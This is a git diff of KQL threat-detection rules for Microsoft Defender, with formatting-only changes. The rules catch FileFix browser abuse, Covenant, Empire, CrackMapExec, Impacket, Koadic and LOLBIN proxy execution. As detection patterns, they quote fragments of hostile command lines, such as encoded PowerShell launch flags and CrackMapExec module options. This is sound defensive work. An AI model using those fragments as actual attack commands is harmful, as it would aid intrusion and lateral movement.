b/KQL/rules/Execution/file_encryption_using_gpg4win.kql 
@@ -1,10 +1,10 @@ -// Title: File Encryption Using Gpg4win -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-08-09 -// Level: medium -// Description: Detects usage of Gpg4win to encrypt files -// MITRE Tactic: Execution -// Tags: attack.execution - -DeviceProcessEvents +// Title: File Encryption Using Gpg4win +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-09 +// Level: medium +// Description: Detects usage of Gpg4win to encrypt files +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents | where (ProcessCommandLine contains " -c " and ProcessCommandLine contains "passphrase") and ((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe") or ProcessVersionInfoFileDescription =~ "GnuPG’s OpenPGP tool") \ No newline at end of file diff --git a/KQL/rules/Execution/file_with_uncommon_extension_created_by_an_office_application.kql b/KQL/rules/Execution/file_with_uncommon_extension_created_by_an_office_application.kql index 650b7be1..3b10723c 100644 --- a/KQL/rules/Execution/file_with_uncommon_extension_created_by_an_office_application.kql +++ b/KQL/rules/Execution/file_with_uncommon_extension_created_by_an_office_application.kql 
@@ -1,10 +1,10 @@ -// Title: File With Uncommon Extension Created By An Office Application -// Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems) -// Date: 2021-08-23 -// Level: high -// Description: Detects the creation of files with an executable or script extension by an Office application. -// MITRE Tactic: Execution -// Tags: attack.t1204.002, attack.execution - -DeviceFileEvents +// Title: File With Uncommon Extension Created By An Office Application +// Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-08-23 +// Level: high +// Description: Detects the creation of files with an executable or script extension by an Office application. +// MITRE Tactic: Execution +// Tags: attack.t1204.002, attack.execution + +DeviceFileEvents | where ((InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\msaccess.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\visio.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".cmd" or FolderPath endswith ".com" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".ocx" or FolderPath endswith ".proj" or FolderPath endswith ".ps1" or FolderPath endswith ".scf" or FolderPath endswith ".scr" or FolderPath endswith ".sys" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".wsf" or FolderPath endswith ".wsh")) and (not((FolderPath contains "\\AppData\\Local\\assembly\\tmp\\" and FolderPath endswith ".dll"))) and (not((((FolderPath contains "C:\\Users\\" and FolderPath contains "\\AppData\\Local\\Microsoft\\Office\\" and FolderPath contains "\\BackstageInAppNavCache\\") and FolderPath endswith ".com") or 
(InitiatingProcessFolderPath endswith "\\winword.exe" and FolderPath contains "\\AppData\\Local\\Temp\\webexdelta\\" and (FolderPath endswith ".dll" or FolderPath endswith ".exe")) or ((FolderPath contains "C:\\Users\\" and FolderPath contains "\\AppData\\Local\\Microsoft\\Office\\" and FolderPath contains "\\WebServiceCache\\AllUsers") and FolderPath endswith ".com")))) \ No newline at end of file diff --git a/KQL/rules/Execution/filefix_command_evidence_in_typedpaths_from_browser_file_upload_abuse.kql b/KQL/rules/Execution/filefix_command_evidence_in_typedpaths_from_browser_file_upload_abuse.kql index 2968f382..e2daa199 100644 --- a/KQL/rules/Execution/filefix_command_evidence_in_typedpaths_from_browser_file_upload_abuse.kql +++ b/KQL/rules/Execution/filefix_command_evidence_in_typedpaths_from_browser_file_upload_abuse.kql 
@@ -1,10 +1,10 @@
-// Title: FileFix - Command Evidence in TypedPaths from Browser File Upload Abuse
-// Author: Alfie Champion (delivr.to)
-// Date: 2025-07-05
-// Level: high
-// Description: Detects commonly-used chained commands and strings in the most recent 'url' value of the 'TypedPaths' key, which could be indicative of a user being targeted by the FileFix technique.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1204.004
-
-DeviceRegistryEvents
+// Title: FileFix - Command Evidence in TypedPaths from Browser File Upload Abuse
+// Author: Alfie Champion (delivr.to)
+// Date: 2025-07-05
+// Level: high
+// Description: Detects commonly-used chained commands and strings in the most recent 'url' value of the 'TypedPaths' key, which could be indicative of a user being targeted by the FileFix technique.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.004
+
+DeviceRegistryEvents
 | where (RegistryValueData contains "#" and (InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe") and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths\\url1") and (RegistryValueData contains "cmd" or RegistryValueData contains "curl" or RegistryValueData contains "powershell" or RegistryValueData contains "bitsadmin" or RegistryValueData contains "certutil" or RegistryValueData contains "mshta" or RegistryValueData contains "regsvr32")
\ No newline at end of file
diff --git a/KQL/rules/Execution/filefix_suspicious_child_process_from_browser_file_upload_abuse.kql b/KQL/rules/Execution/filefix_suspicious_child_process_from_browser_file_upload_abuse.kql
index ce73c5e5..57df535d 100644
--- a/KQL/rules/Execution/filefix_suspicious_child_process_from_browser_file_upload_abuse.kql
+++ b/KQL/rules/Execution/filefix_suspicious_child_process_from_browser_file_upload_abuse.kql 
@@ -1,14 +1,14 @@
-// Title: FileFix - Suspicious Child Process from Browser File Upload Abuse
-// Author: 0xFustang
-// Date: 2025-06-26
-// Level: high
-// Description: Detects potentially suspicious subprocesses such as LOLBINs spawned by web browsers. This activity could be associated with the "FileFix" social engineering technique,
-// where users are tricked into launching the file explorer via a browser-based phishing page and pasting malicious commands into the address bar.
-// The technique abuses clipboard manipulation and disguises command execution as benign file path access, resulting in covert execution of system utilities.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1204.004
-// False Positives:
-// - Legitimate use of PowerShell or other utilities launched from browser extensions or automation tools
-
-DeviceProcessEvents
+// Title: FileFix - Suspicious Child Process from Browser File Upload Abuse
+// Author: 0xFustang
+// Date: 2025-06-26
+// Level: high
+// Description: Detects potentially suspicious subprocesses such as LOLBINs spawned by web browsers. This activity could be associated with the "FileFix" social engineering technique,
+// where users are tricked into launching the file explorer via a browser-based phishing page and pasting malicious commands into the address bar.
+// The technique abuses clipboard manipulation and disguises command execution as benign file path access, resulting in covert execution of system utilities.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.004
+// False Positives:
+// - Legitimate use of PowerShell or other utilities launched from browser extensions or automation tools
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "#" and (FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe") and (InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/forfiles_command_execution.kql b/KQL/rules/Execution/forfiles_command_execution.kql
index 35d2ea1a..cbd7225c 100644
--- a/KQL/rules/Execution/forfiles_command_execution.kql
+++ b/KQL/rules/Execution/forfiles_command_execution.kql
@@ -1,14 +1,14 @@
-// Title: Forfiles Command Execution
-// Author: Tim Rauch, Elastic, E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
-// Date: 2022-06-14
-// Level: medium
-// Description: Detects the execution of "forfiles" with the "/c" flag.
-// While this is an expected behavior of the tool, it can be abused in order to proxy execution through it with any binary.
-// Can be used to bypass application whitelisting.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059
-// False Positives:
-// - Legitimate use via a batch script or by an administrator.
-
-DeviceProcessEvents
+// Title: Forfiles Command Execution
+// Author: Tim Rauch, Elastic, E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
+// Date: 2022-06-14
+// Level: medium
+// Description: Detects the execution of "forfiles" with the "/c" flag.
+// While this is an expected behavior of the tool, it can be abused in order to proxy execution through it with any binary.
+// Can be used to bypass application whitelisting.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+// - Legitimate use via a batch script or by an administrator.
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -c " or ProcessCommandLine contains " /c " or ProcessCommandLine contains " –c " or ProcessCommandLine contains " —c " or ProcessCommandLine contains " ―c ") and (FolderPath endswith "\\forfiles.exe" or ProcessVersionInfoOriginalFileName =~ "forfiles.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/fsutil_behavior_set_symlinkevaluation.kql b/KQL/rules/Execution/fsutil_behavior_set_symlinkevaluation.kql
index 2d845dfc..98e445c1 100644
--- a/KQL/rules/Execution/fsutil_behavior_set_symlinkevaluation.kql
+++ b/KQL/rules/Execution/fsutil_behavior_set_symlinkevaluation.kql
@@ -1,13 +1,13 @@
-// Title: Fsutil Behavior Set SymlinkEvaluation
-// Author: frack113
-// Date: 2022-03-02
-// Level: medium
-// Description: A symbolic link is a type of file that contains a reference to another file.
-// This is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059
-// False Positives:
-// - Legitimate use
-
-DeviceProcessEvents
+// Title: Fsutil Behavior Set SymlinkEvaluation
+// Author: frack113
+// Date: 2022-03-02
+// Level: medium
+// Description: A symbolic link is a type of file that contains a reference to another file.
+// This is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "behavior " and ProcessCommandLine contains "set " and ProcessCommandLine contains "SymlinkEvaluation") and (FolderPath endswith "\\fsutil.exe" or ProcessVersionInfoOriginalFileName =~ "fsutil.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/gac_dll_loaded_via_office_applications.kql b/KQL/rules/Execution/gac_dll_loaded_via_office_applications.kql
index 62765b23..8dd7b57c 100644
--- a/KQL/rules/Execution/gac_dll_loaded_via_office_applications.kql
+++ b/KQL/rules/Execution/gac_dll_loaded_via_office_applications.kql
@@ -1,12 +1,12 @@
-// Title: GAC DLL Loaded Via Office Applications
-// Author: Antonlovesdnb
-// Date: 2020-02-19
-// Level: high
-// Description: Detects any GAC DLL being loaded by an Office Product
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1204.002
-// False Positives:
-// - Legitimate macro usage. Add the appropriate filter according to your environment
-
-DeviceImageLoadEvents
+// Title: GAC DLL Loaded Via Office Applications
+// Author: Antonlovesdnb
+// Date: 2020-02-19
+// Level: high
+// Description: Detects any GAC DLL being loaded by an Office Product
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002
+// False Positives:
+// - Legitimate macro usage. Add the appropriate filter according to your environment
+
+DeviceImageLoadEvents
 | where FolderPath startswith "C:\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL" and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/hacktool_covenant_powershell_launcher.kql b/KQL/rules/Execution/hacktool_covenant_powershell_launcher.kql
index 7c1d5929..f458c6e7 100644
--- a/KQL/rules/Execution/hacktool_covenant_powershell_launcher.kql
+++ b/KQL/rules/Execution/hacktool_covenant_powershell_launcher.kql
@@ -1,10 +1,10 @@
-// Title: HackTool - Covenant PowerShell Launcher
-// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
-// Date: 2020-06-04
-// Level: high
-// Description: Detects suspicious command lines used in Covenant luanchers
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.defense-evasion, attack.t1059.001, attack.t1564.003
-
-DeviceProcessEvents
+// Title: HackTool - Covenant PowerShell Launcher
+// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
+// Date: 2020-06-04
+// Level: high
+// Description: Detects suspicious command lines used in Covenant luanchers
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1059.001, attack.t1564.003
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "-Command" or ProcessCommandLine contains "-EncodedCommand") and (ProcessCommandLine contains "-Sta" and ProcessCommandLine contains "-Nop" and ProcessCommandLine contains "-Window" and ProcessCommandLine contains "Hidden")) or (ProcessCommandLine contains "sv o (New-Object IO.MemorySteam);sv d " or ProcessCommandLine contains "mshta file.hta" or ProcessCommandLine contains "GruntHTTP" or ProcessCommandLine contains "-EncodedCommand cwB2ACAAbwAgA")
\ No newline at end of file
diff --git a/KQL/rules/Execution/hacktool_crackmapexec_execution.kql b/KQL/rules/Execution/hacktool_crackmapexec_execution.kql
index 9892aa5a..a86b278f 100644
--- a/KQL/rules/Execution/hacktool_crackmapexec_execution.kql
+++ b/KQL/rules/Execution/hacktool_crackmapexec_execution.kql
@@ -1,10 +1,10 @@
-// Title: HackTool - CrackMapExec Execution
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-02-25
-// Level: high
-// Description: This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.credential-access, attack.discovery, attack.t1047, attack.t1053, attack.t1059.003, attack.t1059.001, attack.t1110, attack.t1201
-
-DeviceProcessEvents
+// Title: HackTool - CrackMapExec Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-25
+// Level: high
+// Description: This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.credential-access, attack.discovery, attack.t1047, attack.t1053, attack.t1059.003, attack.t1059.001, attack.t1110, attack.t1201
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\crackmapexec.exe" or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -x ") or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -H 'NTHASH'") or (ProcessCommandLine contains " mssql " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -d ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -H " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -o ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " --local-auth")
or ProcessCommandLine contains " -M pe_inject ") or ((ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p ") and (ProcessCommandLine contains " 10." and ProcessCommandLine contains " 192.168." and ProcessCommandLine contains "/24 "))
\ No newline at end of file
diff --git a/KQL/rules/Execution/hacktool_crackmapexec_powershell_obfuscation.kql b/KQL/rules/Execution/hacktool_crackmapexec_powershell_obfuscation.kql
index 074c02c8..633db41a 100644
--- a/KQL/rules/Execution/hacktool_crackmapexec_powershell_obfuscation.kql
+++ b/KQL/rules/Execution/hacktool_crackmapexec_powershell_obfuscation.kql
@@ -1,10 +1,10 @@
-// Title: HackTool - CrackMapExec PowerShell Obfuscation
-// Author: Thomas Patzke
-// Date: 2020-05-22
-// Level: high
-// Description: The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027.005
-
-DeviceProcessEvents
+// Title: HackTool - CrackMapExec PowerShell Obfuscation
+// Author: Thomas Patzke
+// Date: 2020-05-22
+// Level: high
+// Description: The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027.005
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "join" and ProcessCommandLine contains "split") or ProcessCommandLine contains "( $ShellId[1]+$ShellId[13]+'x')" or (ProcessCommandLine contains "( $PSHome[" and ProcessCommandLine contains "]+$PSHOME[" and ProcessCommandLine contains "]+") or ProcessCommandLine contains "( $env:Public[13]+$env:Public[5]+'x')" or (ProcessCommandLine contains "( $env:ComSpec[4," and ProcessCommandLine contains ",25]-Join'')") or ProcessCommandLine contains "[1,3]+'x'-Join'')") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/hacktool_default_powersploit_empire_scheduled_task_creation.kql b/KQL/rules/Execution/hacktool_default_powersploit_empire_scheduled_task_creation.kql
index 04c0865a..62e06e69 100644
--- a/KQL/rules/Execution/hacktool_default_powersploit_empire_scheduled_task_creation.kql
+++ b/KQL/rules/Execution/hacktool_default_powersploit_empire_scheduled_task_creation.kql
@@ -1,12 +1,12 @@
-// Title: HackTool - Default PowerSploit/Empire Scheduled Task Creation
-// Author: Markus Neis, @Karneades
-// Date: 2018-03-06
-// Level: high
-// Description: Detects the creation of a schtask via PowerSploit or Empire Default Configuration.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.s0111, attack.g0022, attack.g0060, car.2013-08-001, attack.t1053.005, attack.t1059.001
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: HackTool - Default PowerSploit/Empire Scheduled Task Creation
+// Author: Markus Neis, @Karneades
+// Date: 2018-03-06
+// Level: high
+// Description: Detects the creation of a schtask via PowerSploit or Empire Default Configuration.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.s0111, attack.g0022, attack.g0060, car.2013-08-001, attack.t1053.005, attack.t1059.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/SC ONLOGON" or ProcessCommandLine contains "/SC DAILY /ST" or ProcessCommandLine contains "/SC ONIDLE" or ProcessCommandLine contains "/SC HOURLY") and (ProcessCommandLine contains "/Create" and ProcessCommandLine contains "powershell.exe -NonI" and ProcessCommandLine contains "/TN Updater /TR") and FolderPath endswith "\\schtasks.exe" and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/hacktool_empire_powershell_launch_parameters.kql b/KQL/rules/Execution/hacktool_empire_powershell_launch_parameters.kql
index 7ca42abc..10b139e8 100644
--- a/KQL/rules/Execution/hacktool_empire_powershell_launch_parameters.kql
+++ b/KQL/rules/Execution/hacktool_empire_powershell_launch_parameters.kql
@@ -1,12 +1,12 @@
-// Title: HackTool - Empire PowerShell Launch Parameters
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019-04-20
-// Level: high
-// Description: Detects suspicious powershell command line parameters used in Empire
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001
-// False Positives:
-// - Other tools that incidentally use the same command line parameters
-
-DeviceProcessEvents
+// Title: HackTool - Empire PowerShell Launch Parameters
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-04-20
+// Level: high
+// Description: Detects suspicious powershell command line parameters used in Empire
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+// - Other tools that incidentally use the same command line parameters
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " -NoP -sta -NonI -W Hidden -Enc " or ProcessCommandLine contains " -noP -sta -w 1 -enc " or ProcessCommandLine contains " -NoP -NonI -W Hidden -enc " or ProcessCommandLine contains " -noP -sta -w 1 -enc" or ProcessCommandLine contains " -enc SQB" or ProcessCommandLine contains " -nop -exec bypass -EncodedCommand "
\ No newline at end of file
diff --git a/KQL/rules/Execution/hacktool_jlaive_in_memory_assembly_execution.kql b/KQL/rules/Execution/hacktool_jlaive_in_memory_assembly_execution.kql
index a8c8d9fb..a5476d32 100644
--- a/KQL/rules/Execution/hacktool_jlaive_in_memory_assembly_execution.kql
+++ b/KQL/rules/Execution/hacktool_jlaive_in_memory_assembly_execution.kql
@@ -1,10 +1,10 @@
-// Title: HackTool - Jlaive In-Memory Assembly Execution
-// Author: Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)
-// Date: 2022-05-24
-// Level: medium
-// Description: Detects the use of Jlaive to execute assemblies in a copied PowerShell
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.003
-
-DeviceProcessEvents
+// Title: HackTool - Jlaive In-Memory Assembly Execution
+// Author: Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)
+// Date: 2022-05-24
+// Level: medium
+// Description: Detects the use of Jlaive to execute assemblies in a copied PowerShell
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.003
+
+DeviceProcessEvents
 | where (InitiatingProcessCommandLine endswith ".bat" and InitiatingProcessFolderPath endswith "\\cmd.exe") and (((ProcessCommandLine contains "powershell.exe" and ProcessCommandLine contains ".bat.exe") and FolderPath endswith "\\xcopy.exe") or ((ProcessCommandLine contains "pwsh.exe" and ProcessCommandLine contains ".bat.exe") and FolderPath endswith "\\xcopy.exe") or ((ProcessCommandLine contains "+s" and ProcessCommandLine contains "+h" and ProcessCommandLine contains ".bat.exe") and FolderPath endswith "\\attrib.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/hacktool_koadic_execution.kql b/KQL/rules/Execution/hacktool_koadic_execution.kql
index 1cdebca1..2470610e 100644
--- a/KQL/rules/Execution/hacktool_koadic_execution.kql
+++ b/KQL/rules/Execution/hacktool_koadic_execution.kql
@@ -1,10 +1,10 @@
-// Title: HackTool - Koadic Execution
-// Author: wagga, Jonhnathan Ribeiro, oscd.community
-// Date: 2020-01-12
-// Level: high
-// Description: Detects command line parameters used by Koadic hack tool
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.003, attack.t1059.005, attack.t1059.007
-
-DeviceProcessEvents
+// Title: HackTool - Koadic Execution
+// Author: wagga, Jonhnathan Ribeiro, oscd.community
+// Date: 2020-01-12
+// Level: high
+// Description: Detects command line parameters used by Koadic hack tool
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.003, attack.t1059.005, attack.t1059.007
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/q" and ProcessCommandLine contains "/c" and ProcessCommandLine contains "chcp") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/hacktool_pchunter_execution.kql b/KQL/rules/Execution/hacktool_pchunter_execution.kql
index 766616e0..f0e70f52 100644
--- a/KQL/rules/Execution/hacktool_pchunter_execution.kql
+++ b/KQL/rules/Execution/hacktool_pchunter_execution.kql
@@ -1,12 +1,12 @@
-// Title: HackTool - PCHunter Execution
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali
-// Date: 2022-10-10
-// Level: high
-// Description: Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.discovery, attack.t1082, attack.t1057, attack.t1012, attack.t1083, attack.t1007
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: HackTool - PCHunter Execution
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali
+// Date: 2022-10-10
+// Level: high
+// Description: Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.discovery, attack.t1082, attack.t1057, attack.t1012, attack.t1083, attack.t1007
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ((SHA1 startswith "5F1CBC3D99558307BC1250D084FA968521482025" or SHA1 startswith "3FB89787CB97D902780DA080545584D97FB1C2EB") or (MD5 startswith "987B65CD9B9F4E9A1AFD8F8B48CF64A7" or MD5 startswith "228DD0C2E6287547E26FFBD973A40F14") or (SHA256 startswith "2B214BDDAAB130C274DE6204AF6DBA5AEEC7433DA99AA950022FA306421A6D32" or SHA256 startswith "55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C")) or (FolderPath endswith "\\PCHunter64.exe" or FolderPath endswith "\\PCHunter32.exe") or (ProcessVersionInfoOriginalFileName =~ "PCHunter.exe" or ProcessVersionInfoFileDescription =~ "Epoolsoft Windows Information View Tools")
\ No newline at end of file
diff --git a/KQL/rules/Execution/hacktool_potential_impacket_lateral_movement_activity.kql b/KQL/rules/Execution/hacktool_potential_impacket_lateral_movement_activity.kql
index 3658ad67..664ddad5 100644
--- a/KQL/rules/Execution/hacktool_potential_impacket_lateral_movement_activity.kql
+++ b/KQL/rules/Execution/hacktool_potential_impacket_lateral_movement_activity.kql
@@ -1,10 +1,10 @@
-// Title: HackTool - Potential Impacket Lateral Movement Activity
-// Author: Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch
-// Date: 2019-09-03
-// Level: high
-// Description: Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1047, attack.lateral-movement, attack.t1021.003
-
-DeviceProcessEvents
+// Title: HackTool - Potential Impacket Lateral Movement Activity
+// Author: Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch
+// Date: 2019-09-03
+// Level: high
+// Description: Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047, attack.lateral-movement, attack.t1021.003
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "cmd.exe" and ProcessCommandLine contains "/C" and ProcessCommandLine contains "Windows\\Temp\\" and ProcessCommandLine contains "&1") and (InitiatingProcessCommandLine contains "svchost.exe -k netsvcs" or InitiatingProcessCommandLine contains "taskeng.exe")) or ((ProcessCommandLine contains "cmd.exe" and ProcessCommandLine contains "/Q" and ProcessCommandLine contains "/c" and ProcessCommandLine contains "\\\\127.0.0.1\\" and ProcessCommandLine contains "&1") and (InitiatingProcessFolderPath endswith "\\wmiprvse.exe" or InitiatingProcessFolderPath endswith "\\mmc.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\services.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/hacktool_redmimicry_winnti_playbook_execution.kql b/KQL/rules/Execution/hacktool_redmimicry_winnti_playbook_execution.kql
index 5199f9e7..7d633d59 100644
--- a/KQL/rules/Execution/hacktool_redmimicry_winnti_playbook_execution.kql
+++ b/KQL/rules/Execution/hacktool_redmimicry_winnti_playbook_execution.kql
@@ -1,10 +1,10 @@
-// Title: HackTool - RedMimicry Winnti Playbook Execution
-// Author: Alexander Rausch
-// Date: 2020-06-24
-// Level: high
-// Description: Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.defense-evasion, attack.t1106, attack.t1059.003, attack.t1218.011
-
-DeviceProcessEvents
+// Title: HackTool - RedMimicry Winnti Playbook Execution
+// Author: Alexander Rausch
+// Date: 2020-06-24
+// Level: high
+// Description: Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1106, attack.t1059.003, attack.t1218.011
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "gthread-3.6.dll" or ProcessCommandLine contains "\\Windows\\Temp\\tmp.bat" or ProcessCommandLine contains "sigcmm-2.4.dll") and (FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\cmd.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/hacktool_sharpwsus_wsuspendu_execution.kql b/KQL/rules/Execution/hacktool_sharpwsus_wsuspendu_execution.kql
index 05cd8f75..4c431cca 100644
--- a/KQL/rules/Execution/hacktool_sharpwsus_wsuspendu_execution.kql
+++ b/KQL/rules/Execution/hacktool_sharpwsus_wsuspendu_execution.kql
@@ -1,11 +1,11 @@
-// Title: HackTool - SharpWSUS/WSUSpendu Execution
-// Author: @Kostastsale, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-10-07
-// Level: high
-// Description: Detects the execution of SharpWSUS or WSUSpendu, utilities that allow for lateral movement through WSUS.
-// Windows Server Update Services (WSUS) is a critical component of Windows systems and is frequently configured in a way that allows an attacker to circumvent internal networking limitations.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.lateral-movement, attack.t1210
-
-DeviceProcessEvents
+// Title: HackTool - SharpWSUS/WSUSpendu Execution
+// Author: @Kostastsale, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-07
+// Level: high
+// Description: Detects the execution of SharpWSUS or WSUSpendu, utilities that allow for lateral movement through WSUS.
+// Windows Server Update Services (WSUS) is a critical component of Windows systems and is frequently configured in a way that allows an attacker to circumvent internal networking limitations.
